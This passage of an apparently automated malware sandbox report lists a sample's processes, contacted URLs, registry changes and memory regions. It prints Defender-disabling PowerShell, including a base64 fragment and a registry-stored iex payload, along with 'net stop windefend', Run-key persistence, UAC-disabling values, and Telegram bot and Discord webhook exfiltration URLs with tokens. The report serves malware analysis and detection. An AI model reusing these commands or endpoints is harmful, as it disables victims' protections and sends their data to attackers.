ABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
malicious
C:\Users\user\AppData\Local\Temp\WinDefend.exe
"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
malicious
C:\Windows\System32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
malicious
C:\Windows\System32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
malicious
C:\Windows\System32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
malicious
C:\Windows\System32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
malicious
C:\Windows\System32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\timeout.exe
timeout 3
C:\Windows\System32\timeout.exe
timeout 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
C:\Windows\System32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\SecurityHealthSystray.exe
SecurityHealthSystray
C:\Windows\System32\SecurityHealthSystray.exe
SecurityHealthSystray
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\System32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\SecurityHealthSystray.exe
SecurityHealthSystray
C:\Windows\System32\SecurityHealthSystray.exe
SecurityHealthSystray
There are 46 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://api64.ipify.org3
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api64.ipify.org/
64.185.227.155
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://api.mylnikPX
unknown
https://api.telegram.orgD
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://icanhazip.com/
104.16.185.241
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage
149.154.167.220
https://github.com/LimerBoy/StormKitty
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://api.telegram.org/bott-
unknown
http://ip-api.com
unknown
https://api.mylnikov.org
unknown
http://api.telegram.orgd
unknown
http://icanhazip.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT
unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT
unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM
unknown
http://nuget.org/NuGet.exe
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
104.21.44.66
https://contoso.com/Icon
unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://api64.ipify.org/t
unknown
http://upx.sf.net
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
http://james.newtonking.com/projects/json
unknown
http://api.telegram.org0
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&
unknown
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
unknown
https://api64.ipify.org
unknown
http://crl.micro
unknown
https://api.mylnikov.org/geolocation/wifi?v=1.p
unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument
149.154.167.220
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
unknown
https://api.telegram.orgn
unknown
https://www.newtonsoft.com/jsonschema
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
http://www.codeplex.com/DotNetZip
unknown
https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson
unknown
https://aka.ms/pscore68
unknown
https://support.mozilla.org
unknown
https://urn.to/r/sds_see
unknown
http://api.telegram.org
unknown
http://api.mylnikov.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 55 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious
81.189.14.0.in-addr.arpa
unknown
malicious
api.mylnikov.org
104.21.44.66
api64.ipify.org
64.185.227.155
windowsupdatebg.s.llnwi.net
87.248.204.0
icanhazip.com
104.16.185.241

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
208.95.112.1
ip-api.com
United States
malicious
66.235.168.242
unknown
United States
malicious
104.21.44.66
api.mylnikov.org
United States
104.16.185.241
icanhazip.com
United States
64.185.227.155
api64.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
YourAppName
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
enablelua
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
promptonsecuredesktop
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration
Notification_Suppress
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications
DisableNotifications
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
DisableAntiSpyware
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WinDefend_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
D179E1D3E1F46C85BB4A03E9C9069E8B529999E776B7B12C2D4A47F622535F8C
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
42B16D214B9336027C3E854C119739FAC4CCEAC6E91045F69D1DB18144B538BD
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
E7A9D37812C43E9D557F509F1D240BC3D3B0732D2B951606E0260A7DE66130E3
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
759453183CB7B6E64FF834B3F6643FD5E8B8F2EE826D662871AD417097BC16AF
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
BEA19E2DECE602CED1D3DF8C825A993F3D412C2A4D4D87EAA39F44BA4FB39E82
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
B68D9D96AF261CD1103255A35838E4D8112598F1A15D860C7B932EE098EE143C
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
42B16D214B9336027C3E854C119739FAC4CCEAC6E91045F69D1DB18144B538BD
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
Version
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
0E9733277EAC197C4EAF40FB0EADA0907388222EF21843488A8E591149768301
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
300A5551F7BE89C5F03C0B70FA7DAFB7F84C6394DAC68BEE95169E985E7786F0
HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1
B93374FDFD9AF786FF20597AE0E242B81373984BA5718194F9E57FEB231C52CF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Loaader_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Volatile Environment
ToggleDefender
HKEY_CURRENT_USER\Volatile Environment
ToggleDefender
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance
Enabled
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
ProgramId
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
FileId
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
LowerCaseLongPath
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
LongPathHash
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Name
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
OriginalFileName
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Publisher
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Version
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
BinFileVersion
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
BinaryType
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
ProductName
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
ProductVersion
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
LinkDate
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
BinProductVersion
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
AppxPackageFullName
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
AppxPackageRelativeId
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Size
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Language
\REGISTRY\A\{d247d3b0-f494-d3a1-aa24-6f546eea4646}\Root\InventoryApplicationFile\loader.exe|54e752857df5bc66
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\UX Configuration
Notification_Suppress
There are 59 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1D160000
trusted library section
page read and write
malicious
28ED000
trusted library allocation
page read and write
malicious
3150000
trusted library allocation
page read and write
malicious
2911000
trusted library allocation
page read and write
malicious
26A3000
trusted library allocation
page read and write
malicious
1332A000
trusted library allocation
page read and write
malicious
352000
unkown
page readonly
malicious
29B8000
trusted library allocation
page read and write
malicious
1D630000
trusted library section
page read and write
malicious
32000
unkown
page readonly
malicious
3071000
trusted library allocation
page read and write
malicious
59F4F7F000
stack
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
1490000
trusted library allocation
page read and write
3242000
trusted library allocation
page read and write
29A07C80000
heap
page read and write
1914BBDB000
heap
page read and write
B645F8E000
stack
page read and write
592C000
stack
page read and write
297B000
trusted library allocation
page read and write
1805EFB000
stack
page read and write
27F3000
trusted library allocation
page read and write
13263000
trusted library allocation
page read and write
348E000
trusted library allocation
page read and write
29E2000
trusted library allocation
page read and write
2EA4000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
64C117E000
stack
page read and write
146E000
stack
page read and write
2E135600000
heap
page read and write
29CB000
trusted library allocation
page read and write
910000
heap
page execute and read and write
311F000
trusted library allocation
page read and write
1B30E000
stack
page read and write
B210000
trusted library allocation
page read and write
EBC000
heap
page read and write
2665000
trusted library allocation
page read and write
1FB66F9000
stack
page read and write
128F0A4A000
heap
page read and write
5193000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
AC9D000
trusted library allocation
page read and write
A55000
heap
page read and write
35E0000
trusted library allocation
page read and write
13094000
trusted library allocation
page read and write
3669000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
2A3A000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page execute and read and write
2D59000
trusted library allocation
page read and write
2B72000
trusted library allocation
page read and write
2EB7000
trusted library allocation
page read and write
15CBE950000
trusted library allocation
page read and write
7FF8490B5000
trusted library allocation
page read and write
15CBE7EE000
heap
page read and write
AB3000
heap
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
2653000
trusted library allocation
page read and write
19134224000
trusted library allocation
page read and write
13EA5F90000
heap
page read and write
29A21DC5000
heap
page read and write
1EC380F5000
heap
page read and write
13E8DC08000
trusted library allocation
page read and write
1010000
heap
page read and write
7FF849084000
trusted library allocation
page read and write
2A50000
trusted library allocation
page read and write
512E000
stack
page read and write
15CC0C7D000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
13E8DA60000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
56CE000
stack
page read and write
1C57BD84000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page read and write
1FB687E000
stack
page read and write
3236000
trusted library allocation
page read and write
B50000
heap
page read and write
2F35000
trusted library allocation
page read and write
2CC2000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
7FF848DFB000
trusted library allocation
page read and write
2F59000
trusted library allocation
page read and write
2913000
trusted library allocation
page read and write
2ED5000
trusted library allocation
page read and write
15CBE910000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
A1E2B7F000
stack
page read and write
A9E0000
trusted library allocation
page read and write
A1E2A7C000
stack
page read and write
267D000
trusted library allocation
page read and write
273577C0000
heap
page read and write
19134BD4000
trusted library allocation
page read and write
7FF8491A2000
trusted library allocation
page read and write
13E8D450000
heap
page execute and read and write
1D5D8B44000
heap
page read and write
1BB10000
heap
page execute and read and write
7FF849070000
trusted library allocation
page read and write
7FF849049000
trusted library allocation
page read and write
13F0000
heap
page read and write
3706000
trusted library allocation
page read and write
1C611230000
heap
page read and write
15CBE742000
heap
page read and write
7FF848FC2000
trusted library allocation
page read and write
1914BFD7000
heap
page read and write
EB3000
trusted library allocation
page execute and read and write
286E000
trusted library allocation
page read and write
295B000
trusted library allocation
page read and write
2787E373000
heap
page read and write
1BA4F000
stack
page read and write
2EC2000
trusted library allocation
page read and write
DF4000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
1450000
trusted library allocation
page read and write
2A60000
heap
page read and write
29A21FE4000
heap
page read and write
2EB0000
trusted library allocation
page read and write
3540000
trusted library allocation
page read and write
1B1FB000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
2E61000
trusted library allocation
page read and write
164F000
stack
page read and write
58A0000
heap
page read and write
13E8F738000
trusted library allocation
page read and write
261207C0000
heap
page read and write
19133880000
heap
page read and write
19134312000
trusted library allocation
page read and write
8E2E000
stack
page read and write
2CF7A360000
heap
page read and write
2697000
trusted library allocation
page read and write
15CBE79E000
heap
page read and write
32A4000
trusted library allocation
page read and write
2968000
trusted library allocation
page read and write
AE10000
heap
page read and write
1C5F7000
stack
page read and write
29A21E70000
heap
page read and write
EF7E000
stack
page read and write
7FF849000000
trusted library allocation
page read and write
2911000
trusted library allocation
page read and write
15CC13CE000
trusted library allocation
page read and write
2C48000
trusted library allocation
page read and write
E1ACC7C000
stack
page read and write
3515000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
2677000
trusted library allocation
page read and write
3330000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
1B10E000
stack
page read and write
529C000
stack
page read and write
1BBEC000
stack
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
29F4000
trusted library allocation
page read and write
7FF849089000
trusted library allocation
page read and write
FE5455E000
stack
page read and write
1B5C0000
heap
page read and write
1A680000
heap
page read and write
2E02000
trusted library allocation
page read and write
19131EC0000
heap
page readonly
3299000
trusted library allocation
page read and write
1A7AAED4000
heap
page read and write
3160000
trusted library allocation
page read and write
29A07CFE000
heap
page read and write
1D5D7118000
heap
page read and write
7D3000
heap
page read and write
1307E000
trusted library allocation
page read and write
2633000
trusted library allocation
page read and write
62C0000
trusted library allocation
page execute and read and write
3675000
trusted library allocation
page read and write
2E13563B000
heap
page read and write
1B7CE000
stack
page read and write
336F000
trusted library allocation
page read and write
29A09B36000
heap
page execute and read and write
EC0000
trusted library allocation
page read and write
27E8000
trusted library allocation
page read and write
3154000
trusted library allocation
page read and write
4EBB000
trusted library allocation
page read and write
1490000
heap
page read and write
1470000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
2E41000
trusted library allocation
page read and write
D853FBF000
stack
page read and write
16C2A885000
heap
page read and write
2BD1000
trusted library allocation
page read and write
6030000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF848E1B000
trusted library allocation
page read and write
26CA000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
29F8000
trusted library allocation
page read and write
5E2E000
stack
page read and write
ECBD000
stack
page read and write
2948000
trusted library allocation
page read and write
15CD874F000
heap
page read and write
64C107F000
stack
page read and write
1B9EE000
stack
page read and write
1B20F000
stack
page read and write
2EF3000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
28CF000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
21426950000
heap
page read and write
740000
heap
page read and write
F65000
heap
page read and write
15CD8A2D000
heap
page read and write
D40000
heap
page read and write
294B000
trusted library allocation
page read and write
34EA000
trusted library allocation
page read and write
29A09A20000
trusted library allocation
page read and write
29A0A2C0000
trusted library allocation
page read and write
2E2C000
trusted library allocation
page read and write
1B61E000
heap
page read and write
E9CC000
stack
page read and write
3923F7E000
stack
page read and write
15CBE784000
heap
page read and write
29A21D50000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
31E5000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
1C57B9A0000
heap
page read and write
3519000
trusted library allocation
page read and write
1E068880000
heap
page read and write
C740000
heap
page read and write
7FF848F91000
trusted library allocation
page read and write
11D7000
heap
page read and write
2CBDFF2C000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2680000
trusted library allocation
page read and write
36E5000
trusted library allocation
page read and write
350A000
trusted library allocation
page read and write
260D000
trusted library allocation
page read and write
16C2A607000
heap
page read and write
19133BD1000
trusted library allocation
page read and write
19133DFF000
trusted library allocation
page read and write
1FB64FE000
stack
page read and write
D8546FE000
stack
page read and write
5312000
trusted library allocation
page read and write
1FB69FB000
stack
page read and write
D8543FE000
stack
page read and write
4F0E000
stack
page read and write
568E000
stack
page read and write
1D81E000
stack
page read and write
1914BD2F000
heap
page read and write
8DA000
unkown
page execute and read and write
1C6114E0000
heap
page read and write
28B9000
trusted library allocation
page read and write
29A096D4000
heap
page read and write
1E068980000
heap
page read and write
10E3000
heap
page read and write
15CD89E8000
heap
page read and write
2787E300000
heap
page read and write
9A027B000
stack
page read and write
15CD89A8000
heap
page read and write
1AE4C000
stack
page read and write
15CBE980000
heap
page read and write
15CBE987000
heap
page read and write
322A000
trusted library allocation
page read and write
2BD3000
trusted library allocation
page read and write
3232000
trusted library allocation
page read and write
19135CE1000
trusted library allocation
page read and write
13E8BB50000
trusted library allocation
page read and write
CA60000
heap
page read and write
2E135894000
heap
page read and write
7FF848F9A000
trusted library allocation
page read and write
7FF848DFC000
trusted library allocation
page read and write
142C000
heap
page read and write
1914BCE0000
heap
page read and write
125F1000
trusted library allocation
page read and write
EF7000
stack
page read and write
29E7000
trusted library allocation
page read and write
31B4000
trusted library allocation
page read and write
19143BE1000
trusted library allocation
page read and write
B1C0000
heap
page read and write
1CF05DF0000
heap
page read and write
2F28000
trusted library allocation
page read and write
2B72000
trusted library allocation
page read and write
35CA000
trusted library allocation
page read and write
F60000
heap
page read and write
15CBE74B000
heap
page read and write
19131D86000
heap
page read and write
2635000
trusted library allocation
page read and write
AC74000
trusted library allocation
page read and write
7D0000
heap
page read and write
15CD8700000
heap
page read and write
21426540000
heap
page read and write
4F0F000
trusted library allocation
page read and write
C7EB47C000
stack
page read and write
2611000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
323A000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
13A7F000
trusted library allocation
page read and write
33FC000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
35B2000
trusted library allocation
page read and write
3296000
trusted library allocation
page read and write
1657A4C5000
heap
page read and write
1B320000
heap
page read and write
D30000
heap
page read and write
2BFE000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page execute and read and write
34A3000
trusted library allocation
page read and write
19133760000
heap
page read and write
13EF7000
trusted library allocation
page read and write
